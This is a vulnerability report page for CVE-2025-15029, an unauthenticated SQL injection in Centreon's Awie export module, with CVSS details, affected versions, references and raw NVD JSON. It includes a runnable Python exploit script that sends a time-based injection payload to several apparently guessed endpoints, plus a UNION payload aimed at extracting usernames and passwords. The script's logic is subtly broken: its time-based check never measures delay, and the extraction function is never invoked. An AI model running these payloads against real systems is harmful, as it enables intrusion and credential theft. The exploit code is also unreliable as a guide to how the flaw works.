Security Vulnerability Report
CVE-2025-15029 CVSS 9.8 CRITICAL

Published: 2026-01-05 15:15:44
Last Modified: 2026-01-26 15:30:14
Source: bd4443e6-1eef-43f3-9886-25fc9ceeaae7

Description

An Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon Infra Monitoring (Awie export modules) allows an unauthenticated user to perform SQL injection. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.3, from 24.04.0 before 24.04.3.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

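cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:* - VULNERABLE (versions from 24.04.0 up to, but excluding, 24.04.3)
cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:* - VULNERABLE (versions from 24.10.0 up to, but excluding, 24.10.3)
cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:* - VULNERABLE (versions from 25.10.0 up to, but excluding, 25.10.2)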
Centreon Infra Monitoring 25.10.0 < 25.10.2
Centreon Infra Monitoring 24.10.0 < 24.10.3
Centreon Infra Monitoring 24.04.0 < 24.04.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-15029 Centreon SQL Injection PoC
# Target: Centreon Infra Monitoring (Awie export modules)
# Vulnerability: SQL Injection in unauthenticated access


def exploit_sqli(target_url):
    """
    SQL Injection PoC for CVE-2025-15029
    This exploits the SQL injection in Centreon Awie export module
    """
    # SQL Injection payload - extracts database version
    # Using time-based blind SQL injection technique
    payload = "' OR (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) -- "

    # Target endpoint - Awie export functionality
    # Adjust path based on Centreon installation
    endpoints = [
        "/centreon/api/index.php?action=awieExport",
        "/api/index.php?action=awieExport",
        "/centreon/main.php?p=60401&o=awie_export"
    ]

    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (compatible; Centreon Scanner)"
    }

    data = {
        "export_format": "sql",
        "host_id": payload,
        "service_id": "1"
    }

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Payload: {payload}")

    for endpoint in endpoints:
        full_url = target_url.rstrip('/') + endpoint
        try:
            print(f"[*] Testing endpoint: {endpoint}")
            response = requests.post(
                full_url,
                data=data,
                headers=headers,
                timeout=10,
                verify=False
            )
            if response.status_code == 200:
                print(f"[!] Potential vulnerability at {endpoint}")
                print(f"[*] Response length: {len(response.text)}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {str(e)}")

    return False


def extract_data(target_url):
    """
    Extract sensitive data using UNION-based SQL injection
    """
    # UNION injection payload to extract users table
    union_payload = "' UNION SELECT 1,2,username,password,5,6,7,8,9 FROM users -- "

    data = {
        "export_format": "sql",
        "host_id": union_payload,
        "service_id": "1"
    }

    try:
        response = requests.post(
            target_url + "/centreon/api/index.php?action=awieExport",
            data=data,
            timeout=30
        )
        if "admin" in response.text.lower() or "password" in response.text.lower():
            print("[!] Successfully extracted sensitive data")
            print(response.text[:500])
    except Exception as e:
        print(f"[-] Data extraction failed: {str(e)}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15029.py <target_url>")
        print("Example: python cve-2025-15029.py http://vulnerable-centreon-server")
        sys.exit(1)

    target = sys.argv[1]
    exploit_sqli(target)
```

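References

https://github.com/centreon/centreon/releases (Release Notes)
https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356 (Patch, Vendor Advisory)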

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15029", "sourceIdentifier": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "published": "2026-01-05T15:15:44.330", "lastModified": "2026-01-26T15:30:13.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon Infra Monitoring (Awie export modules) allows SQL Injection to unauthenticated user.\n\nThis issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.3, from 24.04.0 before 24.04.3."}], "metrics": {"cvssMetricV31": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.04.0", "versionEndExcluding": "24.04.3", "matchCriteriaId": "6C79E858-3E29-4916-9516-E1B7E3EF62B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.10.0", "versionEndExcluding": "24.10.3", "matchCriteriaId": "9F2DA74C-7DB5-47F3-A8E8-7F55E4C73B7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:centreon:awie:*:*:*:*:*:*:*:*", "versionStartIncluding": "25.10.0", "versionEndExcluding": "25.10.2", "matchCriteriaId": "79268CBB-6F6E-45DF-89AA-0D47A201D600"}]}]}], "references": [{"url": 
"https://github.com/centreon/centreon/releases", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Release Notes"]}, {"url": "https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356", "source": "bd4443e6-1eef-43f3-9886-25fc9ceeaae7", "tags": ["Patch", "Vendor Advisory"]}]}}